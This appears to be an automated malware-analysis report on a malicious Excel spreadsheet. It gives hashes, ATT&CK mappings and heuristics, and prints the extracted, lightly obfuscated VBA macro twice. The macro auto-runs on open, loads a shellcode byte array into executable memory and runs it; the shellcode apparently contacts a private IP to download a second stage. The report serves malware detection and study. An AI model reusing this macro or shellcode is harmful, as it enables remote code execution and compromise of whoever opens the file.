Office (OLE) malware analysis — malicious · a5f803dd60bf1f1d

MALICIOUS

Office (OLE)

32.0 KB Created: 2018-06-12 18:51:28 Authoring application: Microsoft Excel First seen: 2019-04-18

MD5: cc215fef9d0a33aa1228f4eb20f65942 SHA-1: 749947aa2d1d2fac98e19a0cbd9317b96c1e3304 SHA-256: a5f803dd60bf1f1d3b3bb917f44f7c0cd42a12c87cefe7b9be341b574334fdd5

64 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File

This Excel document contains VBA macros, including Auto_Open and Workbook_Open, which are commonly used to initiate malicious actions upon opening. The presence of a VirtualAlloc API reference suggests the macro is likely involved in memory allocation for executing shellcode or downloading a payload. The macro's obfuscated nature and the use of Auto_Open indicate a high likelihood of it attempting to download and execute a second-stage payload.

Heuristics 5

Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC

Reference to VirtualAlloc API
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
End Sub
Sub AutoOpen()
Auto_Open
```
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
End Sub
Sub Workbook_Open()
Auto_Open
```

Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro

Matched line in script

#End If
Sub Auto_Open()
Dim test4 As Long, test8 As Variant, test5 As Long

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3357 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3357 bytes
SHA-256: `c78e9fa905aec703910f2274201e1922816cdcec44f7e8b411e3e7547e61e10f`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "EstaPasta_de_trabalho" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Plan1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Módulo1" Const test1 = 2 Const test2 = 1 Const test3 = 0 #End If Sub Auto_Open() Dim test4 As Long, test8 As Variant, test5 As Long #If VBA7 Then Dim test6 As LongPtr, test7 As LongPtr #Else Dim test6 As Long, test7 As Long #End If test8 = Array(232, 130, test3, 0, test3, 96, 137, 229, 49, 192, 100, 139, 80, 48, 139, 82, 12, 139, 82, 20, 139, 114, 40, 15, 183, 74, 38, 49, 255, 172, 60, 97, 124, test1, 44, 32, 193, 207, 13, test2, 199, 226, 242, 82, 87, 139, 82, 16, 139, 74, 60, 139, 76, 17, 120, 227, 72, test2, 209, 81, 139, 89, 32, test2, 211, 139, 73, 24, 227, 58, 73, 139, 52, 139, test2, 214, 49, 255, 172, 193, _ 207, 13, test2, 199, 56, 224, 117, 246, 3, 125, 248, 59, 125, 36, 117, 228, 88, 139, 88, 36, test2, 211, 102, 139, 12, 75, 139, 88, 28, test2, 211, 139, 4, 139, test2, 208, 137, 68, 36, 36, 91, 91, 97, 89, 90, 81, 255, 224, 95, 95, 90, 139, 18, 235, 141, 93, 104, 110, 101, 116, test3, 104, 119, 105, 110, 105, 84, 104, 76, 119, 38, 7, 255, 213, 49, 219, 83, 83, 83, 83, _ 83, 104, 58, 86, 121, 167, 255, 213, 83, 83, 106, 3, 83, 83, 104, 185, test2, test3, 0, 232, 199, test3, 0, test3, 47, 101, 112, 90, 116, 54, 75, 112, 78, 72, 86, 107, 69, 56, 81, 88, 119, 88, 57, 69, 88, 115, 65, 119, 54, 78, 84, 72, 116, 105, 72, 66, 51, 90, 77, 78, 108, 68, 106, 50, 97, 117, 65, 121, 52, 66, 106, 105, 119, 69, 88, 104, 115, 105, 79, test3, _ 80, 104, 87, 137, 159, 198, 255, 213, 137, 198, 83, 104, test3, 50, 224, 132, 83, 83, 83, 87, 83, 86, 104, 235, 85, 46, 59, 255, 213, 150, 106, 10, 95, 104, 128, 51, test3, 0, 137, 224, 106, 4, 80, 106, 31, 86, 104, 117, 70, 158, 134, 255, 213, 83, 83, 83, 83, 86, 104, 45, 6, 24, 123, 255, 213, 133, 192, 117, 20, 104, 136, 19, test3, 0, 104, 68, 240, 53, 224, 255, _ 213, 79, 117, 205, 232, 75, test3, 0, test3, 106, 64, 104, test3, 16, test3, 0, 104, test3, 0, 64, test3, 83, 104, 88, 164, 83, 229, 255, 213, 147, 83, 83, 137, 231, 87, 104, test3, 32, test3, 0, 83, 86, 104, 18, 150, 137, 226, 255, 213, 133, 192, 116, 207, 139, 7, test2, 195, 133, 192, 117, 229, 88, 195, 95, 232, 107, 255, 255, 255, 49, 57, 50, 46, 49, 54, 56, 46, 49, 48, 48, _ 46, 52, 56, test3, 187, 240, 181, 162, 86, 106, test3, 83, 255, 213) test6 = test9(test3, UBound(test8), &H1000, &H40) For test5 = LBound(test8) To UBound(test8) test4 = test8(test5) test7 = test10(test6 + test5, test4, test2) Next test5 test7 = test11(test3, test3, test6, test3, 0, test3) End Sub Sub AutoOpen() Auto_Open End Sub Sub Workbook_Open() Auto_Open End Sub Private Function test12(ByVal test13 As String) As String Dim test14 As Long For test14 = 1 To Len(test13) Step 2 test12 = test12 & Chr$(Val("&H" & Mid$(test13, test14, 2))) Next test14 End Function

SHA-256: c78e9fa905aec703910f2274201e1922816cdcec44f7e8b411e3e7547e61e10f

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "EstaPasta_de_trabalho"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Plan1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Módulo1"
Const test1 = 2
Const test2 = 1
Const test3 = 0
#End If
Sub Auto_Open()
Dim test4 As Long, test8 As Variant, test5 As Long
#If VBA7 Then
Dim test6 As LongPtr, test7 As LongPtr
#Else
Dim test6 As Long, test7 As Long
#End If
test8 = Array(232, 130, test3, 0, test3, 96, 137, 229, 49, 192, 100, 139, 80, 48, 139, 82, 12, 139, 82, 20, 139, 114, 40, 15, 183, 74, 38, 49, 255, 172, 60, 97, 124, test1, 44, 32, 193, 207, 13, test2, 199, 226, 242, 82, 87, 139, 82, 16, 139, 74, 60, 139, 76, 17, 120, 227, 72, test2, 209, 81, 139, 89, 32, test2, 211, 139, 73, 24, 227, 58, 73, 139, 52, 139, test2, 214, 49, 255, 172, 193, _
207, 13, test2, 199, 56, 224, 117, 246, 3, 125, 248, 59, 125, 36, 117, 228, 88, 139, 88, 36, test2, 211, 102, 139, 12, 75, 139, 88, 28, test2, 211, 139, 4, 139, test2, 208, 137, 68, 36, 36, 91, 91, 97, 89, 90, 81, 255, 224, 95, 95, 90, 139, 18, 235, 141, 93, 104, 110, 101, 116, test3, 104, 119, 105, 110, 105, 84, 104, 76, 119, 38, 7, 255, 213, 49, 219, 83, 83, 83, 83, _
83, 104, 58, 86, 121, 167, 255, 213, 83, 83, 106, 3, 83, 83, 104, 185, test2, test3, 0, 232, 199, test3, 0, test3, 47, 101, 112, 90, 116, 54, 75, 112, 78, 72, 86, 107, 69, 56, 81, 88, 119, 88, 57, 69, 88, 115, 65, 119, 54, 78, 84, 72, 116, 105, 72, 66, 51, 90, 77, 78, 108, 68, 106, 50, 97, 117, 65, 121, 52, 66, 106, 105, 119, 69, 88, 104, 115, 105, 79, test3, _
80, 104, 87, 137, 159, 198, 255, 213, 137, 198, 83, 104, test3, 50, 224, 132, 83, 83, 83, 87, 83, 86, 104, 235, 85, 46, 59, 255, 213, 150, 106, 10, 95, 104, 128, 51, test3, 0, 137, 224, 106, 4, 80, 106, 31, 86, 104, 117, 70, 158, 134, 255, 213, 83, 83, 83, 83, 86, 104, 45, 6, 24, 123, 255, 213, 133, 192, 117, 20, 104, 136, 19, test3, 0, 104, 68, 240, 53, 224, 255, _
213, 79, 117, 205, 232, 75, test3, 0, test3, 106, 64, 104, test3, 16, test3, 0, 104, test3, 0, 64, test3, 83, 104, 88, 164, 83, 229, 255, 213, 147, 83, 83, 137, 231, 87, 104, test3, 32, test3, 0, 83, 86, 104, 18, 150, 137, 226, 255, 213, 133, 192, 116, 207, 139, 7, test2, 195, 133, 192, 117, 229, 88, 195, 95, 232, 107, 255, 255, 255, 49, 57, 50, 46, 49, 54, 56, 46, 49, 48, 48, _
46, 52, 56, test3, 187, 240, 181, 162, 86, 106, test3, 83, 255, 213)
test6 = test9(test3, UBound(test8), &H1000, &H40)
For test5 = LBound(test8) To UBound(test8)
test4 = test8(test5)
test7 = test10(test6 + test5, test4, test2)
Next test5
test7 = test11(test3, test3, test6, test3, 0, test3)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
Private Function test12(ByVal test13 As String) As String
Dim test14 As Long
For test14 = 1 To Len(test13) Step 2
test12 = test12 & Chr$(Val("&H" & Mid$(test13, test14, 2)))
Next test14
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.